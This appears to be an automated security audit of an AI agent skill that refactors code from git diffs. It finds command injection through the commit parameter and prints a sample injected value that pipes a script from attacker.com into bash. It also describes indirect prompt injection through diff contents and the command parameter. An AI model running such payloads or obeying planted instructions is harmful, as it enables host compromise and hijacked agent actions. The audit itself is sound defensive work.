Skills
skills/theonelee/theone_claude_skill/git_refactor_skill/Gen Agent Trust Hub

git_refactor_skill

Fail

Audited by Gen Agent Trust Hub on Feb 16, 2026

Risk Level: HIGHCOMMAND_EXECUTIONPROMPT_INJECTION
Full Analysis
  • [COMMAND_EXECUTION] (HIGH): The skill explicitly states it uses git diff <git_commit> HEAD. The <git_commit> variable is directly interpolated into a shell command without sanitization. An attacker could provide input such as ; curl http://attacker.com/script | bash ; to achieve arbitrary code execution on the host machine.
  • [PROMPT_INJECTION] (HIGH): This skill is highly susceptible to Indirect Prompt Injection (Category 8).
  • Ingestion points: The output of the git diff command (SKILL.md).
  • Boundary markers: None are defined to separate the untrusted diff data from the agent's instructions.
  • Capability inventory: The skill performs command execution and is tasked with 'implementing refactoring,' which implies file-write or further command execution capabilities.
  • Sanitization: None. Malicious instructions embedded in the code history (e.g., as comments) could hijack the agent's logic during the analysis phase.
  • [PROMPT_INJECTION] (MEDIUM): The <command> parameter provides a direct injection vector. While the skill instructs the agent to follow the user's refactoring requirements, it lacks constraints to prevent the user from overriding the core logic or extracting sensitive information through this prompt.
Recommendations
  • AI detected serious security threats
Audit Metadata
Risk Level
HIGH
Analyzed
Feb 16, 2026, 10:39 AM